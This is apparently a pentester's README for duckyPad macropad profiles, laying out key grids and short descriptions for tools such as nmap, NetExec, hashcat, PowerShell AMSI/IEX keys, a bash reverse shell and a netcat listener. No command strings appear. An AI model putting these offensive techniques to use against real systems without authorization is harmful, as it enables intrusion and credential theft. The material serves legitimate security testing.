i am a pentester and these are my profiles. i use them constantly and am constantly adding and updating them. +v indicates its pasting from your clipboard, useful for pasting in a hostname for nmap or testssl. im not entirely consistant with the naming.
if you are unsure of what a duckypad is or would like to buy one (non-affiliated): https://www.tindie.com/products/dekunukem/duckypad-do-it-all-mechanical-macropad/
the following previews were generated using this script: https://github.com/jayrox/duckypad_profile_preview_gen
i am starting to add some documentation to the keys using a comment format of REM DOC:
in the individual keys that will be parsed out by the generator code.
Key descriptions:
- Windows: Windows based commands
- NumPad: NumPad
- Help: Helpful websites
- SetVars: Env variables used in the various scripts.
- HTB: Hacktheboxisms - http://app.hackthebox.eu/
- TestSSL: Testing TLS/SSL encryption anywhere on any port - https://github.com/drwetter/testssl.sh
- NMap: the Network Mapper. - https://github.com/nmap/nmap
- PS: PowerShell
- Witness: Witness Me
- NetExec: https://github.com/Pennyw0rth/NetExec
- curl: cURL
- Nikto: Nikto
- GoBustr: GoBuster
Help | ||
---- | ||
curl |
Key descriptions:
- Skpfish: SkipFish
ADSI | ||
Respond | ||
Key descriptions:
- CME: CrackMapExec
- John: Password cracker John
- PGo: Little automation to run the CalcyIV/PokeGenie scanners
VS | ||
Waymore | - | - |
- | - | - |
Ansible | - |
intro | hide | dev |
taskMgr | files | sysInfo |
diskMgr | - | taskViw |
7 | 8 | 9 |
4 | 5 | 6 |
1 | 2 | 3 |
0 | . |
Key descriptions:
- WADComs: Launches Firefox to https://wadcoms.github.io/
- LOLBAS: Launches Firefox to https://lolbas-project.github.io/
- GTFOBin: Launches Firefox to https://gtfobins.github.io/
- Payload: Launches Firefox to https://github.com/swisskyrepo/PayloadsAllTheThings
Explain | WADComs | LOLBAS |
tldr | GTFOBin | Payload |
- | - | |
- | - | - |
- | - |
Key descriptions:
- Bash: Adds a few aliases to the .bashrc file to help set env variables that can be used in other profiles
- ZSH: Adds a few aliases to the .zshrc file to help set env variables that can be used in other profiles
- Fish: Adds a few aliases to the ~/.config/fish/config.fish file to help set env variables that can be used in other profiles
- SetVars: Go to the SetVars profile.
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- ECHO: Print out env variables used in the various scripts.
Host(s) | Port(s) | - |
Domain | DC IP | - |
User | Pass | - |
- | ||
- |
Key descriptions:
- CU Enc: Uses certurl to base64 encode a file
- CU Dec: Uses certurl to base64 decode a file
- CU DL: Uses certurl to download a remote file
- | - | - |
test | test2 | - |
- | - |
Key descriptions:
- Squiddy: Launch Squiddy, my personal pentest tracking and report generation tool
Squiddy | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Setup | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Procs: Get running processes
- Upgrade: Upgrade reverse shell
Sudo-l | FndRoot | ls -la |
GetCap | AppArmo | Procs |
------- | ------- | |
Hosts | NC 4444 | Srv80 |
Key descriptions:
- +Hosts: Creates a prompt for an IP and Host name, then adds them to the /etc/hosts file
- GetMail: Get Mail folders
- BashRev: Uses LHOST and LPORT from the SetVars profile
- BashRev: More info: https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
- FixVPN: Updates the HTB VPN to NOT be the default/main connection. Thus fixing the issue where external resources are unable to load.
Py2SH | Py3SH | |
GetMail | - | |
- | - | - |
- | FixVPN | |
Key descriptions:
- Whoami: Get Windows user's privs
- Whoami: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Whoami | - | - |
- | - | |
Dir A | Set | - |
- | - | - |
Key descriptions:
- TLS12: Enable TLS 1.2
- Proxy: Setup PowerShell to use the corporate proxy authenticated
- Daren: Some PowerShell functions from Daren
AMSI3 | ||
PwrCat | ||
LngMode | ||
MpPref | ||
GetC_DN | Priv | Obj SID |
GetU_Pr | - | S- SID |
ExecPol | U GUID | C GUID |
IEX | - | - |
DL | - | - |
- | - | - |
- | - | - |
Key descriptions:
- Mass+v: Runs TestSSL against hosts in the clipboard. One host per line, saves output as JSON
Full | Short | Mass+v |
Full | Fast | |
Mass+v | ||
- | ||
- | Paste | |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
Simple | - | |
LDAP | - | |
RidBrut | ||
Key descriptions:
- RIDBrut: Enumerate usernames
- Shares: Enumerate SMB shares.
- Users: Enumerate SMB shares.
- Spider: Enumerate SMB shares.
- Basic: Test connection
- Help: Try username as blank, 'anonymous', 'guest', or pass a file of users
ZeroLog | ||
Basic | - | - |
- | - | - |
- |
BasicSS | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Basic | - | |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- ikL: Include response headers in output, allow insecure connections and follow redirects
- ikL+v: Include response headers in output, allow insecure connections and follow redirects. Pastes URL from clipboard
ikL | dl_file | - |
dl_file | - | |
- | - | - |
- | - | - |
- |
Basic | - | - |
80,443 | - | - |
- | - | - |
- | - | - |
- |
Dir | - | |
- | - | Follow |
- | - | Output |
- | - | K Cert |
- |
FuzzSub | Size | - |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- Size: Filter on size
- Words: Filter on words
Dir | - | - |
Sub DNS | Size | |
- | - | - |
- | - | - |
- |
SCIR | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_DC_IP env variables be set. Go to the SetVars profile to set.
Neo4j | Start | - |
PyBlood | - | - |
- | - | - |
- | CrtiVln | - |
- |
Display | SAM | Title |
Admin | - | - |
- | - | - |
- | - | - |
- | - |
venv+r | - | |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Server: Use a specific dns server
dig | - | Types |
Server | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
Base | - | |
Recurse | Grep | Find |
- | - | - |
- | - | - |
Key descriptions:
- Get: Get individual file
Connect | - | |
- | - | |
- | ||
- | - | - |
Start | - | - |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, and DP_DOMAIN env variables be set. Go to the SetVars profile to set.
- | ||
- | - | - |
- | ||
- | - | - |
Key descriptions:
- Crawl: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- FSCode: Ignore certain HTTP status codes
- Proxy: Set proxy, Burp is default
Crawl | - | Out |
FSCode | Timeout | Threads |
- | - | - |
Proxy | - | - |
- |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, DP_PORTS, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
- | ConVars | |
- | ||
Tables | ||
DBs | ||
Host | File | |
dbms | DBs | Tables |
Data | DB | Table |
- | - | |
- |
Connect | - | - |
DBs | Use DB | - |
Tables | - | - |
- | - | - |
- |
Key descriptions:
- Detect: Use hashcat to detect hashing algorithm
- Crack: Use hashcat to crack hashes in file
- Show: Show cracked password from hashcat
Detect | - | - |
Crack | - | Show |
- | - | - |
- | - | - |
- |
Key descriptions:
- Compile: Compile a .cs file
Compile | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Crack: Update the path for rockyou.txt, may need to extract from tar.gz
- Crack: locate rockyou.txt
- Crack: tar -xvf /full/path/to/rockyou.txt.tar.gz
- Show: Show any cracked passwords
- SSH2Joh: Find the path for SSH2John: locate ssh2john
- SSH2Joh: Python script: https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
Show | - | |
- | - | |
- | - | - |
- | - | - |
- |
URLs +v | ||
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- Scan: Does not currently work
Scan | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |